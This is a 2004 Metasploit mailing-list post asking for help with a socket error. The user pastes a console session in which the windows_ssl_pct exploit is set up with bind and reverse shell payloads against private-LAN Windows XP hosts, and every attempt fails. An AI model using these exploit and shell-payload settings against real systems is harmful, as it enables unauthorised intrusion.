Metasploit mailing list archives

Error creating socket: Connection failed:


From: gatekeeper at globenet.com.ph (gatekeeper)
Date: Fri, 20 Aug 2004 15:28:52 +0800

Hi,

I am running metasploit within cgywin. I always get this error:

[*] Error creating socket: Connection failed: Operation now in progress

Am I missing a libpcap here or something? Please advice. Thank you.

jun g.
"hiding in plain sight"

===================================================
msf windows_ssl_pct > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf windows_ssl_pct(win32_bind) > exploit RHOST
[*] WARNING: the correct case of the 'target' variable is 'TARGET'
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows XP SP0
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Bind Handler.

msf windows_ssl_pct(win32_bind) > set target 6
target -> 6
msf windows_ssl_pct(win32_bind) > set
Avoid: 0
Keys: win32_bind
PAYLOAD: win32_bind
RHOST: 192.168.3.3
Space: 1800
target: 6
msf windows_ssl_pct(win32_bind) > exploit
[*] WARNING: the correct case of the 'target' variable is 'TARGET'
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows XP SP1
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Bind Handler.

msf windows_ssl_pct(win32_bind) > set RHOST 192.168.3.9
RHOST -> 192.168.3.9
msf windows_ssl_pct(win32_bind) > exploit
[*] WARNING: the correct case of the 'target' variable is 'TARGET'
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows XP SP1
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Bind Handler.

msf windows_ssl_pct(win32_bind) > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf windows_ssl_pct(win32_reverse) > exploit
Error: Missing required option: LHOST
msf windows_ssl_pct(win32_reverse) > set LHOST 192.168.3.3
LHOST -> 192.168.3.3
msf windows_ssl_pct(win32_reverse) > set
Avoid: 0
Keys: win32_bind
LHOST: 192.168.3.3
PAYLOAD: win32_reverse
RHOST: 192.168.3.9
Space: 1800
target: 6
msf windows_ssl_pct(win32_reverse) > exploit
[*] WARNING: the correct case of the 'target' variable is 'TARGET'
[*] Starting Reverse Handler.
[*] Attempting to exploit target Windows XP SP1
[*] Error creating socket: Connection failed: Operation now in progress
[*] Exiting Reverse Handler.

msf windows_ssl_pct(win32_reverse) >
===================================================




Current thread: